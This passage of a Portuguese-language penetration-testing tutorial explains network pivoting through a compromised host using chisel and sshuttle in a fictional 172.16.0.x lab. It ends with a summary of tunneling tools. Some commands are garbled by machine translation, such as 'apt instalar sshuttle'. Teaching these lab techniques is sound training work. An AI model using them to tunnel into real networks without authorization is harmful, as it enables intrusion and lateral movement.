No host comprometido, montamos um servidor de cinzel:

`# ./chisel server -p listen_port`

Agora nos conectamos a ele de nosso host de ataque:

` #./chisel client listen_IP:listen_port local_port:target_ip:target_port`

Por exemplo, para se conectar a *172.16.0.5:8000* (o host comprometido executando um servidor de chisel), encaminhando nossa porta local 2222 a 172.16.0.10:22 (nosso alvo pretendido), poderíamos usar:

`# ./chisel client 172.16.0.5:8000 2222:172.16.0.10:22`

Quando tivermos processos em background, e queremos destruir nossas conexões de chisel, podemos usar o comando *jobs* para ver a lista de *jobs* em background, depois *kill %NUMBER* para destruir cada um dos processos de chisel.

Nota: Ao usar o chisel no **Windows**, é importante lembrar de carregá-lo com uma extensão de arquivo de *.exe* (por exemplo, *chisel.exe*)!


## sshuttle

Finalmente, vamos dar uma olhada na nossa última ferramenta desta seção: ***sshuttle***.

Esta ferramenta é bem diferente dos outros que estudamos até agora. Não realiza um *port forward* e o proxy cria não é nada como os que já vimos. Em vez disso, usa uma conexão SSH para criar um proxy tunnelled que atua como uma nova interface.
Em suma, simula uma VPN, permitindo-nos direcionar nosso tráfego através do proxy sem o uso de *proxychains* (ou equivalentes). Podemos apenas conectar diretamente a dispositivos na rede de destino, pois normalmente conectaríamos a dispositivos em rede. 
Como cria um túnel através do ssh (o shell seguro), qualquer coisa que enviamos através do túnel também é criptografada, que é um bom bônus. Usamos o **SShuttle** inteiramente em nossa máquina de ataque, da mesma maneira que SSH em um servidor remoto.

Enquanto isso soa como uma atualização incrível, mas também tem suas desvantagens. Para começar, o *SShuttle* só funciona em alvos do Linux. Também requer acesso ao servidor comprometido via SSH, e o Python também precisa ser instalado no servidor. Dito isto, com o acesso do SSH, poderia teoricamente ser possível fazer upload de uma cópia estática de Python e trabalhar com isso. Essas restrições fazem um pouco os usos para o SSHuttle; No entanto, quando é uma opção, ele tende a ser uma aposta ideal!

Primeiro de tudo, precisamos instalar o SShuttle. No Kali, isso é tão fácil quanto usar o Gerente de Pacotes APT:

`# apt instalar sshuttle`

O comando básico para se conectar a um servidor com *sshuttle* é o seguinte:

`# ssHuttle -R Username @ Endereço da sub-rede`

Por exemplo, em nossa rede fictícia *172.16.0.x* com um servidor comprometido em *172.16.0.5*, o comando seria esse:

`# sshuttle -r user@172.16.0.5 172.16.0.0/24`

Seríamos então solicitados a senha do usuário e o proxy seria estabelecido. A ferramenta apenas se sentará passivamente em segundo plano e encaminhará o tráfego relevante para a rede de destino.

Em vez de especificar sub-redes, também poderíamos usar a opção *-n* que tenta determiná-las automaticamente com base na própria tabela de roteamento do servidor comprometida:

`# sshuttle -r username @ endereço -n`  

**Tenha em mente que isso pode nem sempre ser bem sucedido!**

Tal como acontece com as ferramentas anteriores, esses comandos também poderiam ser utilizados com o *&*, para manter o trabalho em background.

Se isso funcionou, você verá a seguinte linha:

`C: conectado ao servidor.`

Mas o que acontece se não tivermos a senha do usuário, ou o servidor aceita apenas a autenticação baseada em chaves?

Infelizmente, o *SShuttle* não parece ter uma flag para especificar uma chave privada para autenticar ao servidor. Dito isto, podemos facilmente ignorar esta limitação usando a flag *--ssh-cmd*.

Essa chave nos permite especificar qual comando é executado pelo *sshuttle* ao tentar autenticar com o servidor comprometido. Por padrão, isso é simplesmente SSH sem argumentos. Com utilizamos a flag *--ssh-cmd*, podemos escolher um comando diferente para executar para autenticação: digamos, *ssh -i keyfile*, por exemplo!

Então, ao usar a autenticação baseada em chaves (*keys*), o comando final parece algo assim:

`# sshuttle -r user@endereço --ssh-cmd "ssh -i keyfile" subnet`

Utilizando os dados do exemplo anterior, o comando seria:

`# sshuttle -r user@172.16.0.5 --ssh-cmd "ssh -i private_key" 172.16.0.0/24`

**Nota**: Ao usar o SShuttle, você pode encontrar um erro que se pareça com o erro abaixo:

`client: Connected.`

`client_loop: send disconnect: Broken pipe`

`client: fatal: server died with error code 255`

Isso pode ocorrer quando a máquina comprometida que você está se conectando é parte da sub-rede que você está tentando obter acesso. Por exemplo, se estivermos se conectando a *172.16.0.5* e tentando encaminhar tráfego para *172.16.0.0/24*, então estaríamos incluindo o servidor comprometido dentro da sub-rede recém-encaminhada, interrompendo assim a conexão e fazendo com que a ferramenta morresse.

Para contornar isso, dizemos a *SShuttle* para excluir o servidor comprometido a partir do intervalo de sub-rede usando o a flag *-x*.

Utilizando os dados do exemplo anterior:

`# sshuttle -r user@172.16.0.5 172.16.0.0/24 -x 172.16.0.5`

Isso permitirá que o *SShuttle* crie uma conexão sem se interromper.


# Conclusão

As grandes lições e dicas desta seção são:

-   Existem muitas maneiras diferentes de realizar pivoting através de uma rede. Outras pesquisas em seu próprio tempo são altamente recomendadas, pois há muitas técnicas interessantes que não tivemos tempo para cobrir aqui (por exemplo, em um alvo totalmente *rooted*, é possível usar o firewall instalado - por exemplo, iptables ou Firewall - para criar pontos de entrada em uma rede inacessível. Igualmente, é possível configurar uma rota manualmente na tabela de roteamento de sua máquina de ataque para, roteando seu tráfego na rede de destino sem exigir uma ferramenta proxy, como proxychains ou Foxyproxy).

Como resumo das ferramentas nesta seção:

-   **Proxychains** e **FoxyProxy** são usados ​​para acessar um proxy criado com uma das outras ferramentas;

-   **SSH** pode ser usado para criar ambss os *port forwars*, e *proxies*;

-   **Plink.exe** é um cliente *SSH* para *Windows*, permitindo que você crie conexões SSH reversas no Windows;

-   *SOCAT* é uma boa opção para redirecionar conexões, e pode ser usado para criar *port forwards* de várias maneiras diferentes;

-   O **chisel** pode fazer exatamente a mesma coisa que com o *SSH Port forwarding*/*Tunneling*, mas não requer acesso *SSH* na caixa;

O **SShuttle** é uma maneira mais agradável de criar um proxy quando temos acesso SSH em um alvo;

O Pivoting verdadeiramente é um grande tópico. No entanto, espero que eu tenha contribuído para o aprendizado daqueles que estejam lendo esse enorme tópico!
